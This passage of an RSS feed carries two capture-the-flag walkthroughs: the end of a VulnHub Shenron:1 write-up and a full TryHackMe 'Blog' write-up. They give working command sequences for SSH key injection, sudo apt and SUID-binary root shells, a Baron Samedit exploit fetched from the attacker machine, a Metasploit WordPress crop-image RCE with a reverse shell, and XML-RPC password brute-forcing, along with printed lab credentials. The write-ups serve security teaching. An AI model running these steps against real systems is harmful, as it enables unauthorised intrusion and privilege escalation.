root@kali" &gt; /tmp/authorized_keys</pre><ol><li>Use sudo cp as shenron to overwrite their authorized_keys:</li></ol><pre>sudo -u shenron /usr/bin/cp /tmp/authorized_keys /home/shenron/.ssh/authorized_keys</pre><ol><li>SSH in as shenron from Kali:</li></ol><pre>ssh -i /tmp/hacked_key shenron@192.168.100.210</pre><p>Shell received:</p><pre>Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-58-generic x86_64)<br>shenron@shenron:~$</pre><h3>User Flag</h3><pre>cat /home/shenron/local.txt</pre><pre>098bf43cc909e1f89bb4c910bd31e1d4</pre><p>🚩 <strong>User flag captured.</strong></p><h3>Privilege Escalation: shenron → root</h3><p>Three independent root escalation paths were identified:</p><h3>Path 1: sudo apt GTFOBins {#path-1}</h3><pre>sudo -l</pre><pre>User shenron may run the following commands on shenron:<br>    (ALL : ALL) /usr/bin/apt</pre><p>apt is on <a href="https://gtfobins.github.io/gtfobins/apt/">GTFOBins</a>. The Pre-Invoke option in apt allows injecting an arbitrary command before any apt operation:</p><pre>sudo /usr/bin/apt update -o APT::Update::Pre-Invoke::="/bin/bash"</pre><p>Password prompted (found in the next section). Result:</p><pre>root@shenron:/tmp# id<br>uid=0(root) gid=0(root) groups=0(root)</pre><h3>F-07 — Plaintext Password File (shenron’s credentials)</h3><p>Before escalating, I ran LinPEAS and discovered:</p><pre>cat /var/opt/password.txt</pre><pre>shenron : YoUkNowMyPaSsWoRdIsToStRoNgDeAr</pre><p>A system user’s password stored in a plaintext file in a world-readable directory.</p><p><strong>Root Flag:</strong></p><pre>cat /root/root.txt</pre><pre>Your Root Flag Is Here :- aa087b2d466cd593622798c8e972bffb</pre><p>🚩 <strong>Root flag captured.</strong></p><h3>Path 2: CVE-2021–3156 — Baron Samedit {#path-2}</h3><p>The system runs sudo 1.8.31 on Ubuntu 20.04.1. This version is vulnerable to <strong>CVE-2021-3156 (Baron Samedit)</strong>, a heap-based buffer overflow in sudo that allows any local user to gain root privileges without knowing the sudo password.</p><pre>sudo --version<br># Sudo version 1.8.31</pre><p>I transferred the PoC exploit (by blasty) to the target via a Python HTTP server:</p><pre># On Kali:<br>git clone https://github.com/blasty/CVE-2021-3156<br>cd CVE-2021-3156<br>python3 -m http.server 8080</pre><pre># On target (as shenron):<br>cd /home/shenron<br>wget <a href="http://192.168.100.130:8080/CVE-2021-3156-main.zip">http://192.168.100.130:8080/CVE-2021-3156-main.zip</a><br>unzip CVE-2021-3156-main.zip<br>cd CVE-2021-3156-main<br>make<br>./sudo-hax-me-a-sandwich 1</pre><pre>** CVE-2021-3156 PoC by blasty &lt;peter@haxx.in&gt;<br>using target: Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31<br>** pray for your rootshell.. **<br>[+] bl1ng bl1ng! We got it!<br># id<br>uid=0(root) gid=0(root) groups=0(root),1002(shenron)</pre><p>Root achieved via an unpatched kernel-level CVE — entirely independent of the sudo misconfiguration in Path 1.</p><h3>Path 3: MySQL Root Shell Execution {#path-3}</h3><p>LinPEAS flagged a world-readable MySQL maintenance credentials file:</p><pre>cat /etc/mysql/debian.cnf</pre><pre>[client]<br>host     = localhost<br>user     = debian-sys-maint<br>password = IcEgakXDwR6Sf4VJ</pre><p>Logged into MySQL as root (after resetting the root password using the debian-sys-maint credentials):</p><pre>mysql -u root -proot</pre><p>Inside MySQL, used the \! shell escape to execute system commands as the MySQL process owner (root):</p><pre>mysql&gt; \! id<br>uid=0(root) gid=0(root) groups=0(root)</pre><pre>mysql&gt; \! whoami<br>root</pre><p>A third, fully independent path to root — all from a misconfigured file permission.</p><h3>Post-Exploitation — LinPEAS Analysis</h3><p>After rooting the box, I ran a full LinPEAS scan to document any additional attack surface:</p><pre># On Kali:<br>wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh<br>python3 -m http.server 8080</pre><pre># On target:<br>cd /tmp<br>wget <a href="http://192.168.100.130:8080/linpeas.sh">http://192.168.100.130:8080/linpeas.sh</a><br>chmod +x linpeas.sh<br>./linpeas.sh | tee /tmp/linpeas_output.txt</pre><h3>Additional findings from LinPEAS:</h3><p>Finding Location Severity sudo 1.8.31 → CVE-2021–3156 System Critical Kernel CVE-2021–22555 Netfilter heap OOB High Kernel CVE-2022–2586 nft_object UAF High MySQL credentials exposed /etc/mysql/debian.cnf High Joomla 3.x (End of Life) Web server High PHP 7.4.3 (outdated) Web server Medium Apache 2.4.41 (outdated) Web server Medium</p><h3>Attack Chain Summary</h3><pre>[Attacker / Kali Linux]<br>        │<br>        ▼<br>[1] Nmap → ports 22, 80 open<br>        │<br>        ▼<br>[2] Dirb → /joomla/, /test/ discovered<br>        │<br>        ▼<br>[3] /test/password → HTML comment → admin credentials (F-01)<br>        │<br>        ▼<br>[4] Joomla admin login → malicious extension upload → RCE (F-03)<br>        │<br>        ▼<br>[5] Reverse shell → www-data<br>        │<br>        ▼<br>[6] configuration.php → jenny:Mypa$$wordi$notharD@123 (F-04)<br>        │<br>        ▼<br>[7] su jenny → password reuse (F-05)<br>        │<br>        ▼<br>[8] sudo -l → cp NOPASSWD as shenron → SSH key injection (F-06)<br>        │<br>        ▼<br>[9] SSH → shenron ✓  local.txt: 098bf43cc909e1f89bb4c910bd31e1d4<br>        │<br>        ├──[Path 1]── sudo apt GTFOBins + /var/opt/password.txt (F-07, F-08) → root<br>        ├──[Path 2]── CVE-2021-3156 Baron Samedit (F-09) → root<br>        └──[Path 3]── /etc/mysql/debian.cnf → MySQL \! shell (F-10) → root</pre><pre>root.txt: aa087b2d466cd593622798c8e972bffb ✓</pre><h3>Key Takeaways</h3><p>This machine packs a dense set of real-world lessons into a compact attack chain:</p><p><strong>1. Never store credentials in HTML source code.</strong> The HTML comment in /test/password was the single biggest mistake on this machine. Without it, the entire attack chain collapses. Treat your HTML source as fully public — because it is.</p><p><strong>2. Separate service credentials from system account credentials.</strong> Using the same password for the Joomla database user and the OS account jenny allowed a lateral pivot that should not have been possible. Always use distinct, randomly generated credentials per service.</p><p><strong>3. Audit your sudoers file carefully — GTFOBins is real.</strong> Both cp and apt are on GTFOBins. Any binary listed there should never appear in a sudoers file without strict command argument restrictions. Run sudo -l as part of every system audit.</p><p><strong>4. Keep sudo patched.</strong> CVE-2021–3156 is a critical, well-known sudo vulnerability. Sudo 1.8.31 on Ubuntu 20.04 should have been patched months before this test. Patch management is not optional.</p><p><strong>5. File permissions matter.</strong> /var/opt/password.txt containing a plaintext user password and /etc/mysql/debian.cnf being world-readable are configuration failures that hand attackers the keys directly.</p><p><strong>6. End-of-Life software is a liability.</strong> Joomla 3.x reached End of Life. Running EOL software means no more security updates — even critical ones. Upgrade or migrate.</p><p><em>Thanks for reading! If you enjoyed this writeup, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools and other work on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=05d09a54ab77" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/vulnhub-shenron-1-full-walkthrough-05d09a54ab77">VulnHub — Shenron: 1 | Full Walkthrough</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe — Blog CTF | Full Write-Up]]></title>
<description><![CDATA[Platform: TryHackMeRoom: BlogDifficulty: MediumAuthor: Shikhali Jamalzade“Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome!”IntroductionThe Blog room on TryHackMe is a medium-difficulty machine themed around a WordPress blog run by “Billy Joel...]]></description>
<link>https://tsecurity.de/de/3606856/hacking/tryhackme-blog-ctf-full-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606856/hacking/tryhackme-blog-ctf-full-write-up/</guid>
<pubDate>Thu, 18 Jun 2026 08:51:19 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uiddSAKswc3c72q8QRJ2Wg.png"></figure><h4><strong>Platform:</strong> <a href="https://tryhackme.com/p/alisalive.exe">TryHackMe</a><br><strong>Room:</strong> <a href="https://tryhackme.com/room/blog">Blog</a><br><strong>Difficulty:</strong> Medium<br><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a></h4><blockquote>“Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome!”</blockquote><h3>Introduction</h3><p>The <strong>Blog</strong> room on TryHackMe is a medium-difficulty machine themed around a WordPress blog run by “Billy Joel.” Beneath the casual surface, the machine hides a real CVE — <strong>CVE-2019–8942</strong>, a WordPress image crop Remote Code Execution vulnerability — paired with an unconventional custom binary for privilege escalation that’ll make you think twice before assuming an exploit needs complex reverse engineering.</p><p>Your goals:</p><ul><li>Find user.txt (not where you expect it)</li><li>Find root.txt</li><li>Answer three bonus questions about the machine</li></ul><p>There’s also a deliberate <strong>rabbit hole</strong> built into this room — a clue about a company called “Rubber Ducky Inc.” that hints at where the real user.txt is hiding. More on that later.</p><h3>Setup — /etc/hosts</h3><p>Before anything else, the room requires you to add an entry to your hosts file. Without this, the WordPress site won’t load correctly due to how it handles virtual hosting on AWS.</p><p>bash</p><pre>echo "&lt;TARGET_IP&gt; blog.thm" | sudo tee -a /etc/hosts</pre><p>Verify it works:</p><p>bash</p><pre>curl -s http://blog.thm | head -20</pre><h3>Phase 1 — Reconnaissance</h3><h3>Nmap Scan</h3><p>bash</p><pre>nmap -sC -sV -T4 -oN nmap_scan.txt &lt;TARGET_IP&gt;</pre><p><strong>Results:</strong></p><pre>PORT    STATE SERVICE     VERSION<br>22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu<br>80/tcp  open  http        Apache httpd 2.4.29<br>139/tcp open  netbios-ssn Samba smbd 3.X - 4.X<br>445/tcp open  microsoft-ds Samba smbd 4.7.6-Ubuntu</pre><p>Four open ports: SSH (22), HTTP (80), and two SMB ports (139, 445). The SMB shares are interesting — let’s note them for later. The web server on port 80 is our primary entry point.</p><p>The nmap script output also reveals something valuable right away:</p><pre>| http-generator: WordPress 5.0</pre><p>WordPress 5.0. That version number will be very significant shortly.</p><h3>Phase 2 — SMB Enumeration (The Rabbit Hole)</h3><p>With SMB open, let’s enumerate it. This is where the room tries to send you down a rabbit hole — and it’s worth walking through so you understand <em>why</em> it’s a dead end.</p><p>bash</p><pre>smbclient -L //&lt;TARGET_IP&gt;/ -N</pre><p>There’s a share called BillySMB. Connect to it:</p><p>bash</p><pre>smbclient //&lt;TARGET_IP&gt;/BillySMB -N<br>smb: \&gt; ls<br>smb: \&gt; get Alice-White-Rabbit.jpg<br>smb: \&gt; get tswift.jpg<br>smb: \&gt; get check-this.png</pre><p>Checking these files for hidden data (steganography):</p><p>bash</p><pre>steghide extract -sf Alice-White-Rabbit.jpg<br>strings check-this.png<br>exiftool tswift.jpg</pre><p>You’ll find a .txt file embedded in the Alice image, but it contains nothing useful for exploitation. The "Rubber Ducky Inc." reference in the room description is actually a hint pointing at /media/usb — but that's for after we get root.</p><p><strong>Verdict: SMB is a rabbit hole. Move on.</strong></p><h3>Phase 3 — WordPress Enumeration</h3><p>Visit http://blog.thm in your browser. It's a simple WordPress blog — a few posts, a comment section, nothing remarkable on the surface.</p><h3>WPScan — Full Enumeration</h3><p>bash</p><pre>wpscan --url http://blog.thm --enumerate ap,at,u --detection-mode aggressive</pre><p><strong>Flag breakdown:</strong></p><ul><li>--enumerate ap — All Plugins</li><li>--enumerate at — All Themes</li><li>--enumerate u — Users</li><li>--detection-mode aggressive — More thorough (generates noise, but we're in a lab)</li></ul><p><strong>Key findings:</strong></p><pre>[+] WordPress version: 5.0 (Insecure, released on 2018-12-06)<br>[+] XML-RPC seems to be enabled: http://blog.thm/xmlrpc.php</pre><pre>[i] User(s) Identified:<br>    [+] kwheel<br>    [+] bjoel<br>    [+] Karen Wheeler<br>    [+] Billy Joel</pre><p>Two important takeaways:</p><ol><li>WordPress 5.0 is running — this is vulnerable to CVE-2019–8942</li><li>We have usernames: kwheel and bjoel</li></ol><p>You can also enumerate users via the WordPress REST API without WPScan:</p><pre>http://blog.thm/wp-json/wp/v2/users</pre><p>This returns a JSON response listing all registered users — another common WordPress misconfiguration.</p><h3>Phase 4 — Credential Brute-Force</h3><p>We have usernames but no passwords. WPScan can brute-force via the XML-RPC interface, which is faster than attacking the login form directly.</p><p>bash</p><pre>wpscan --url http://blog.thm \<br>  -U kwheel,bjoel \<br>  -P /usr/share/wordlists/rockyou.txt \<br>  -t 50</pre><ul><li>-U — Username list</li><li>-P — Password wordlist</li><li>-t 50 — 50 threads for speed</li></ul><p><strong>Result:</strong></p><pre>[SUCCESS] - kwheel / cutiepie1</pre><blockquote><strong><em>Credentials found:</em></strong><em> </em><em>kwheel:cutiepie1</em></blockquote><p>Note that bjoel (Billy Joel himself) doesn't have a crackable password in rockyou — the machine intentionally made kwheel (Karen Wheeler) the weak link.</p><h3>Phase 5 — Exploitation: CVE-2019–8942 (WordPress Crop-Image RCE)</h3><h3>Understanding the Vulnerability</h3><p><strong>CVE-2019–8942</strong> affects WordPress 5.0.0 and earlier. Here’s how it works conceptually:</p><p>When WordPress manages uploaded images, it stores file references in the database as “Post Meta” entries. When cropping an image, WordPress constructs a path from this meta entry — but it doesn’t sanitize the value properly. An attacker with author-level (or higher) access can manipulate this path to point to a PHP file they control, effectively uploading a webshell.</p><p>The vulnerability was discovered by RIPSTECH and patched in WordPress 5.0.1. Our target is running 5.0.0 — right in the vulnerable range.</p><p><strong>References:</strong></p><ul><li><a href="https://www.exploit-db.com/exploits/46662">ExploitDB #46662</a> — Metasploit module</li><li><a href="https://www.exploit-db.com/exploits/49512">ExploitDB #49512</a> — Python manual exploit</li></ul><h3>Exploitation with Metasploit</h3><p>bash</p><pre>msfconsole</pre><pre>msf6 &gt; use exploit/multi/http/wp_crop_rce<br>msf6 exploit(wp_crop_rce) &gt; show options</pre><p>Set the required options:</p><p>bash</p><pre>set RHOSTS &lt;TARGET_IP&gt;<br>set LHOST &lt;YOUR_VPN_IP&gt;     # Your tun0 IP, NOT wlan0<br>set LPORT 4444<br>set USERNAME kwheel<br>set PASSWORD cutiepie1<br>set TARGETURI /<br>run</pre><blockquote><strong><em>Important:</em></strong><em> LHOST must be your TryHackMe VPN IP (</em><em>tun0), not your local network IP. Run </em><em>ip a show tun0 to confirm.</em></blockquote><p>After a moment:</p><pre>[*] Started reverse TCP handler on &lt;YOUR_IP&gt;:4444<br>[*] Authenticating with WordPress using kwheel:cutiepie1...<br>[+] Authenticated with WordPress<br>[*] Preparing payload...<br>[*] Uploading payload<br>[*] Executing the payload<br>[+] Deleted malicious post<br>[+] Deleted malicious attachment<br>[*] Sending stage (39282 bytes) to &lt;TARGET_IP&gt;<br>[+] Meterpreter session 1 opened</pre><p>We have a Meterpreter session as www-data.</p><h3>Upgrading to a Full Shell</h3><p>From Meterpreter, drop into a system shell and stabilize it:</p><p>bash</p><pre>meterpreter &gt; shell<br>python -c 'import pty; pty.spawn("/bin/bash")'<br>export TERM=xterm<br># Press Ctrl+Z, then: stty raw -echo; fg</pre><p>bash</p><pre>id<br># uid=33(www-data) gid=33(www-data) groups=33(www-data)</pre><h3>Phase 6 — Post-Exploitation &amp; Flag Hunting</h3><h3>The Rabbit Hole — /home/bjoel</h3><p>bash</p><pre>cd /home<br>ls<br># bjoel</pre><pre>cd bjoel<br>ls -la<br># -rw-r--r-- 1 bjoel bjoel   57  ... user.txt<br># -rw-r--r-- 1 bjoel bjoel  ... Billy_Joel_Termination_May20-2020.pdf</pre><p>Read user.txt:</p><pre>cat user.txt<br># You won't find what you're looking for here.<br># TRY HARDER</pre><p>Classic CTF misdirection. The user.txt here is intentionally fake. The PDF is also a lore piece: Billy Joel was "terminated" by <strong>Rubber Ducky Inc.</strong> — remember that company name. It's a hint.</p><p>The real user.txt is mounted somewhere else. We'll find it after getting root.</p><h3>wp-config.php — Database Credentials</h3><p>While exploring, check the WordPress config:</p><p>bash</p><pre>cat /var/www/wordpress/wp-config.php | grep -E "DB_NAME|DB_USER|DB_PASSWORD"</pre><p>This reveals database credentials. You can log into MySQL and inspect the wp_users table:</p><p>bash</p><pre>mysql -u wordpress -p wordpress<br>SELECT user_login, user_pass FROM wp_users;</pre><p>You’ll find two password hashes. These are bcrypt-hashed and won’t crack easily — they’re another dead end.</p><h3>Phase 7 — Privilege Escalation: The checker Binary</h3><h3>Finding SUID Files</h3><p>bash</p><pre>find / -perm -u=s -type f 2&gt;/dev/null</pre><p>Among the standard SUID binaries, one stands out:</p><pre>/usr/sbin/checker</pre><p>This is not a standard Linux binary — it’s custom-built for this machine. Owned by root, SUID set. Let’s investigate.</p><h3>Running the Binary</h3><p>bash</p><pre>/usr/sbin/checker<br># Not an Admin</pre><p>It outputs “Not an Admin” and exits. But <em>how</em> does it decide we’re not an admin?</p><h3>Analyzing with ltrace</h3><p>ltrace intercepts and displays library calls made by a program as it runs — perfect for understanding what a binary is checking without needing to decompile it.</p><p>bash</p><pre>ltrace /usr/sbin/checker</pre><p><strong>Output:</strong></p><pre>getenv("admin")                      = nil<br>puts("Not an Admin")                 = 13<br>+++ exited (status 0) +++</pre><p>That’s all we needed to know. The binary calls getenv("admin") — it checks for an environment variable named admin. If it's nil (not set), it prints "Not an Admin" and exits. The check is purely existence-based; <strong>the value doesn't matter</strong>.</p><h3>Deeper Understanding — Ghidra (Optional)</h3><p>For the curious, the binary’s decompiled C logic in Ghidra looks approximately like this:</p><p>c</p><pre>int main() {<br>    char *admin = getenv("admin");<br>    if (admin == NULL) {<br>        puts("Not an Admin");<br>        exit(0);<br>    }<br>    setuid(0);       // Set UID to root<br>    system("/bin/bash");  // Drop into bash as root<br>}</pre><p>Because the binary has the SUID bit set and is owned by root, when setuid(0) is called, it escalates our process to run as root. All we need to do is make sure the admin environment variable exists.</p><h3>Exploiting the Binary</h3><p>bash</p><pre>export admin=1<br>/usr/sbin/checker</pre><p><strong>Result:</strong></p><pre>root@blog:/home/bjoel# id<br>uid=0(root) gid=33(www-data) groups=33(www-data)</pre><p>We are root.</p><h3>Capturing root.txt</h3><p>bash</p><pre>cat /root/root.txt</pre><blockquote><em>🚩 </em><strong><em>root.txt:</em></strong><em> </em><em>9a0b2b618bef9bfa7ac28c1353d9f318</em></blockquote><h3>Phase 8 — Finding the Real user.txt</h3><p>Remember “Rubber Ducky Inc.”? The USB reference in Billy’s termination letter was pointing us here:</p><p>bash</p><pre>find / -name "user.txt" 2&gt;/dev/null</pre><p><strong>Output:</strong></p><pre>/home/bjoel/user.txt       ← the fake one<br>/media/usb/user.txt        ← the real one</pre><p>bash</p><pre>cat /media/usb/user.txt</pre><blockquote><em>🚩 </em><strong><em>user.txt:</em></strong><em> </em><em>c8421899aae571f7af486492b71a8ab7</em></blockquote><p>The USB mount at /media/usb was inaccessible to www-data, which is why we couldn't read it before gaining root. The "Rubber Ducky" and "Termination" story in the PDF was the in-lore hint that a USB drive was involved.</p><h3>Room Questions — Answered</h3><p>QuestionAnswerWhat CMS was Billy using?WordPressWhat version of the above CMS was being used?5.0Where was user.txt found?/media/usb</p><h3>Attack Chain Summary</h3><pre>Nmap → 4 ports: SSH, HTTP (WordPress 5.0), SMB<br>           ↓<br>SMB enumeration → BillySMB share → rabbit hole (steganography, no useful data)<br>           ↓<br>WPScan enumeration → users: kwheel, bjoel<br>           ↓<br>WPScan brute-force via XML-RPC → kwheel:cutiepie1<br>           ↓<br>CVE-2019-8942 (wp_crop_rce) → Meterpreter shell as www-data<br>           ↓<br>/home/bjoel/user.txt → fake flag ("TRY HARDER")<br>PDF hint → "Rubber Ducky Inc." → points to /media/usb<br>           ↓<br>SUID enumeration → /usr/sbin/checker<br>ltrace → getenv("admin") == nil check<br>export admin=1 &amp;&amp; /usr/sbin/checker → root shell<br>           ↓<br>root.txt captured from /root/<br>user.txt captured from /media/usb/</pre><h3>Lessons Learned</h3><p><strong>1. Read the lore.</strong> The PDF found in Billy’s home directory wasn’t just flavor text — “Rubber Ducky Inc.” was the hint pointing at the USB mount. CTF designers embed clues everywhere.</p><p><strong>2. Don’t trust the obvious user.txt.</strong> This room deliberately placed a fake flag to frustrate anyone who found it and thought they were done. Always verify your flags match the expected format.</p><p><strong>3. ltrace is underrated.</strong> You don’t always need Ghidra or a full decompilation to understand a binary. ltrace showed us the exact library call being made in one line. Use it before reaching for heavier tools.</p><p><strong>4. XML-RPC is a wide-open door.</strong> WordPress’s XML-RPC interface (/xmlrpc.php) allows unlimited login attempts by default — no lockout, no CAPTCHA. This makes it a far more efficient brute-force target than the login form itself.</p><p><strong>5. Environment variables as authentication is broken.</strong> The checker binary's logic is fundamentally flawed: checking for the <em>existence</em> of an environment variable (with no signature, no value check, no privilege validation) is not security — it's theater. Any code running in that shell could set the variable.</p><p><strong>6. WordPress 5.0.0 is ancient — patch your CMS.</strong> CVE-2019–8942 was disclosed in February 2019 and patched immediately in 5.0.1. Running unpatched CMS versions is one of the most common real-world attack vectors.</p><h3>Tools Used</h3><p>ToolPurposenmapPort scanning &amp; service fingerprintingsmbclientSMB share enumerationWPScanWordPress enumeration &amp; credential brute-forceMetasploit (wp_crop_rce)CVE-2019-8942 exploitationltraceDynamic binary analysisGhidraStatic binary reverse engineering (optional)findSUID file discovery &amp; flag hunting</p><h3>Flags</h3><p>FlagValueuser.txtc8421899aae571f7af486492b71a8ab7root.txt9a0b2b618bef9bfa7ac28c1353d9f318</p><p><em>Thanks for reading. If you have questions or want to discuss the manual exploitation path for CVE-2019–8942 (without Metasploit), drop a comment below.</em></p><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=5220fa169761" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/tryhackme-blog-ctf-full-write-up-5220fa169761">TryHackMe — Blog CTF | Full Write-Up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,38ms -->